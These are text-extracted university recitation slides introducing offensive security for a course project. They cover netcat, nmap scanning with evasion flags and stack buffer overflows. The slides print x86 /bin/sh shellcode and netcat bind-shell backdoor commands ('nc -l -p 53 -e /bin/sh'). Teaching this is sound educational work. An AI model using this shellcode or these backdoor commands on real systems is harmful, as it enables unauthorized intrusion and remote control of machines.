Security 101

CPS 110 Recitation

Amre Shakimov Duke University

© Sam McIngvale, Whitney Young, Yan Chen Northwestern university

“Weak Link” of any System/Program?

PROGRAMMER & USERS

Overview

• “C00L t00lz” for “hacking” :) • Project 3 overview and few hints

telnet

• telnet is used for communication with another host using the TELNET protocol. – $ telnet www.cs.duke.edu 80 • telnet is useful for network interaction with servers • telnet traffic is not encrypted and therefore not secure

netcat

• The TCP/IP swiss-army knife • netcat is a simple UNIX utility that reads and writes data across network connections. • Simplest usage: – $ nc host port – Creates a TCP connection to the given port on the target host. Standard input is sent to the host and anything that comes back is standard output.

Advanced netcat

• Transferring files – Set-up receiving host to listen on a specific port and put all received data into a file (remember to set a time- out)

• $ nc -vvn -l -p 3000 > file – -l (listens for incoming connections), -vv (verbosity level), -w (timeout), -n (don't reslove Ips) – Set-up sending side to connect to listening host and send a file

• $ nc -vvn xxx.xxx.xxx.xxx 3000 < file

Nmap

• Nmap (“network mapper”) is an open-source port/ security scanner. – http://insecure.org/ • It’s primary function is the discovery and mapping of hosts on a network. – We will use Nmap for port-scanning. • Nmap is consistently voted as one of the most used security tools.

Nmap

• Nmap is capable of: – Host Discovery – Identifying computers on a network. – Port Scanning – Enumerating the open ports on one or more target computers. – Version Detection – Interrogating listening network services listening on remote computers to determine the application name and version number. – OS Detection – Remotely determining the operating system from network devices.

Power of nmap

Nmap

• Note: must be root to run Nmap – Nmap crafts raw packets and sends them over the network interface...on Linux you must be root to use this capability.

• use sudo

Nmap

• Command line options – Host Discovery: • -P0 treat all hosts as online (skip host discovery) – Scan Techniques: • -sS/sT/sA/sW/sM tcp syn/connect/ack/window/maimon scans • -sN/sF/sX tcp null/fin/xmas scans – Port Specification • -p only scan specified ports -p 22, -p 1-65535,

Nmap

• More Command Line Options – Service/Version Detection • -sV probe open ports to determine service/version info – OS Detection • -O enable OS detection • -A enables OS detection and version detection – Firewall/IDS Evasion • -f fragment packets • -S spoof source address

• -g use given port number Nmap

• Typical Nmap command line: – $ nmap -A -sS -P0 -p 1-65535 scanme.nmap.org • Try it!

netstat/ps • Once you have access to a box...what do you do? • Two useful tools are netstat and ps – netstat – ps

ps

• To see all processes you are running – $ ps • To see all processes running on the machine • $ps ax • $ps aux (to see user information) • To see all processes root is running – $ps aux | grep root

Source Code Availability

• In general, we will always have source code available for analysis. – This mirrors real-world situations. Imagine downloading a program from source. • Things can get tricky when source code is not available. – Bruteforcing becomes extremely helpful. – Reverse engineering is another option.

Project 3

• The goal is to learn security by learning how to view your machine as a 'hacker' • Can be extremely easy (few hours of work) • Can be extremely difficult (sleepless nights) • Coding is tiny (max 20-30 lines) • Code requires a lot of thinking (1 byte may change everything) • We will be happy to help but only with concepts

What you will do in Project 3 • Scan host for open ports (use nmap + parameters) • Determine what service is vulnerable (use nc and simple program) • Write exploit for this service (nc is not enough) and get shell for this machine (source will be available) • Go inside and explore (goal: obtain password for this user – not-root yet) • Exploit different SUIID programs to get root- privileges • Done! (we need all commands you used and source code of all exploits)

Stack Revisited

• Structure • Frame • Ret Address • Why do we care?

Stack Structure

• The stack is used for storing runtime information about function calls – Stored in “Stack Frames”

• Stack structure is processor-dependent – x86, PPC, Sparc

• x86 is the dominant architecture for personal computers

Stack Frame int func(int arg1, int arg2) { char buffer[64]; return 1; } Frame pointer arg2 (ebp) arg1 ret ebp Stack pointer (esp) buffer

We want to overwrite the return address

Ultimate Goal

• In order of importance (to us) – Get root access – Get any access (because it might lead to root access through another vulnerability)

• To launch a shell – system(“/bin/sh”)

How to Get a Shell

• Return to a place in the code that executes a shell – system(“/bin/sh”)

• What if there is no code in the program that executes a shell?

– Shellcode

– Inject code into the application as a string

Shellcode

• Shellcode is compiled code in string format that can be executed to get an interactive shell

char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" "\xe8\xdc\xff\xff\xff/bin/sh";

Shellcode • Hard to write – Architecture-dependent – Must remove all string-delimiting characters

• Easy to find * – Aleph1's Smashing the Stack

* you need to understand what it does (don't execute shellcode of “rm -Rf ~/” on your machine :)) * Think about shellcode for the Project (launching /bin/sh is not enough for remote exploit).

Injecting Shellcode

• Standard method – Usually, shellcode is stored directly in the buffer that's being overflowed

• Alternate methods – Environment variables – Configuration files

Remote Issues

• How to get a shell across a network – Different shellcode • Determining stack information without debugger • Can't use environment variables or configuration files for shellcode injection

Assumptions

• Return location on the stack is known – This doesn't hold – the stack addresses are affected by the environment in which the program was started

• Shell will be executed locally – We want to be able to attack remote machines

Overcoming Assumptions

• How to deal with changing stack location – Brute force – Nops

• How to get a remote shell – Really complicated shellcode

Brute Forcing With Nops

• Guess every possible return address in address space until getting a shell – Infeasible with 4GB address space (imagine 64bit machines) • Adding nops – Like a ; in C code – doesn't do anything – Adding 200 nops allows the search time to be decreased by a factor of 200

Remote Shell

• There are many solutions • One example

Create shellcode from:

nc -l -p 8000 -c '/bin/sh'

Connect and get shell with:

nc server_address 8000

Advanced netcat

• Shell shoveling using TCP (simple backdoor) – If there is no firewall protecting the target, or if there is a misconfiguration (tcp/53 to all hosts), an attacker can put up a nc-listener that shovels back a shell

• $ nc -l -p 53 -e /bin/sh – -e (execute command on connection) – Then, just connect to the target • $ nc target_ip port